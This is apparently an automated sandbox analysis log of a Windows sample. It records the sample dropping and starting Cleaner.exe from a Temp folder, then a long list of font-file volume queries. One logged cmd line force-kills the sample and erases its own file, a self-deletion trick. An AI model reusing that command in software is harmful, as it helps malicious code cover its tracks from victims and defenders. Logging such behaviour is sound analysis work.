Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager
Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ZK]ZF.program manager

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
